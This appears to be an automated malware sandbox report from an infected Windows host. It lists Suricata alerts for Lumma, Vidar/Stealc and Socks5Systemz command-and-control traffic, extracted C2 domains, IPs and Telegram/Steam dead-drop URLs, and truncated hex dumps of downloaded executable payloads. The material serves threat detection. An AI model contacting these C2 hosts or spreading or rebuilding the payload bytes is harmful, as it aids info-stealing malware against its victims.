Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:54478 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49790 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49792 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49803 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49803 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49794 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49794 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49798 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49802 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49798 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49802 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49805 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49805 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49806 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49806 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49791 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49808 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49811 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49811 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49812 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49812 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49813 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49813 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49810 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49810 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49815 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49815 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49808 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49824 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49824 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49807 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49807 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49823 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49826 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49826 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49820 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49814 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49820 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49814 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49823 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49821 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49821 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49818 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49818 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49828 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49829 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49828 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49829 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49830 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49830 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49819 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49819 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49832 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49832 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49827 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49827 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49831 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49831 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49822 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49822 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49834 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49834 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.126.10:80 -> 192.168.2.4:49796
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49816 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49816 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.126.10:80 -> 192.168.2.4:49835
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.126.10:80 -> 192.168.2.4:49796
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.126.10:80 -> 192.168.2.4:49835
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49817 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49817 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49768 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49771 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49764 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49780 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49780 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49764 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49779 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49779 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49790 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49790 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49791 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49791 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49788 -> 194.163.35.141:443
Source: Malware configuration extractor URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor URLs: stamppreewntnq.shop
Source: Malware configuration extractor URLs: evoliutwoqm.shop
Source: Malware configuration extractor URLs: locatedblsoqp.shop
Source: Malware configuration extractor URLs: condedqpwqm.shop
Source: Malware configuration extractor URLs: caffegclasiqwp.shop
Source: Malware configuration extractor URLs: traineiwnqo.shop
Source: Malware configuration extractor URLs: stagedchheiqwo.shop
Source: Malware configuration extractor URLs: millyscroqwp.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199768374681
Source: Malware configuration extractor URLs: https://t.me/edm0d
Source: Malware configuration extractor URLs: https://t.me/fneogr
Source: Malware configuration extractor URLs: 147.45.47.36:30035
Source: unknown Network traffic detected: IP country count 10
Source: global traffic TCP traffic: 192.168.2.4:49754 -> 77.105.164.24:50505
Source: global traffic TCP traffic: 192.168.2.4:49760 -> 147.45.47.36:30035
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 301608Last-Modified: Thu, 05 Sep 2024 22:53:24 GMTConnection: keep-aliveETag: "66da3664-49a28"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 222248Last-Modified: Thu, 05 Sep 2024 22:29:59 GMTConnection: keep-aliveETag: "66da30e7-36428"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 1792000Last-Modified: Fri, 06 Sep 2024 04:31:27 GMTConnection: keep-aliveETag: "66da859f-1b5800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 10902016Last-Modified: Thu, 22 Aug 2024 08:54:11 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66c6fcb3-a65a00"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 3443448Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=install.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: public
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 513536Last-Modified: Wed, 04 Sep 2024 17:23:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d897ad-7d600"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:06 GMTContent-Type: application/octet-streamContent-Length: 3851776Last-Modified: Mon, 02 Sep 2024 11:18:17 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d59ef9-3ac600"X-Content-Type-Options: nosniffAccept-Ranges: bytes
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:09 GMTContent-Type: application/octet-streamContent-Length: 14748160Last-Modified: Fri, 30 Aug 2024 12:15:51 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d1b7f7-e10a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 34 de 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 60 00 00 e6 0a 00 00 00 00 00 10 7c 07 00 00 10 00 00 00 40 d1 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 c0 e4 00 00 04 00 00 56 55 e1 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 dc 00 4c 04 00 00 00 e0 e1 00 95 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 00 5c fa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 56 d1 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 86 60 00 00 10 00 00 00 88 60 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c 93 70 00 00 a0 60 00 00 94 70 00 00 8c 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 77 0b 00 00 40 d1 00 00 12 08 00 00 20 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 c0 dc 00 00 06 00 00 00 32 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c fa 04 00 00 d0 dc 00 
00 fc 04 00 00 38 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 d0 e1 00 00 02 00 00 00 34 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 95 d2 02 00 00 e0 e1 00 00 d4 02 00 00 36 de 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:14 GMTContent-Type: application/octet-streamContent-Length: 331776Last-Modified: Thu, 05 Sep 2024 16:36:50 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d9de22-51000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c4 dc d9 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 04 05 00 00 0a 00 00 00 00 00 00 de 22 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 22 05 00 4b 00 00 00 00 40 05 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 05 00 0c 00 00 00 4c 22 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 02 05 00 00 20 00 00 00 04 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 40 05 00 00 08 00 00 00 06 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 0e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 22 05 00 00 00 00 00 48 00 00 00 02 00 05 00 28 26 00 00 88 17 00 00 03 00 02 00 0b 00 00 06 b0 3d 00 00 e8 1d 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5d 00 00 00 01 00 00 11 2b 05 28 fb 03 4f 4f 7e 01 00 00 04 3a 4b 00 00 00 17 80 01 00 00 04 28 10 00 00 0a 20 e8 07 00 00 20 09 00 00 00 20 05 00 00 00 73 11 00 00 0a 28 12 00 00 0a fe 0e 00 00 fe 0d 00 00 28 13 00 00 0a 28 14 00 00 0a 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 15 00 00 0a 7a 2a 00 00 00 36 2b 05 28 63 88 12 4f 28 01 00 00 06 2a 00 00 4e 2b 05 28 44 b0 3c 35 28 15 00 00 06 02 28 16 00 00 0a 2a fa 2b 05 28 f9 08 51 4e 28 15 00 00 06 1f 10 8d 1c 00 00 01 25 d0 06 00 00 04 28 17 00 00 0a 80 02 00 00 04 20 00 c0 04 00 8d 1c 00 00 01 25 d0 07 00 00 04 28 17 00 00 0a 80 03 00 00 04 2a 00 6a 2b 05 28 52 ff 69 5b 28 15 00 00 06 02 28 16 00 00 0a 02 03 28 06 00 00 06 2a 00 13 30 03 00 34 00 00 00 02 00 00 11 2b 05 28 65 95 62 69 03 0b 16 0c 38 12 00 00 00 07 08 6f 18 00 00 0a 0a 06 28 19 00 00 0a 08 17 58 0c 08 07 6f 1a 00 00 0a 3f e2 ff ff ff 28 1b 00 00 0a 2a 13 30 0
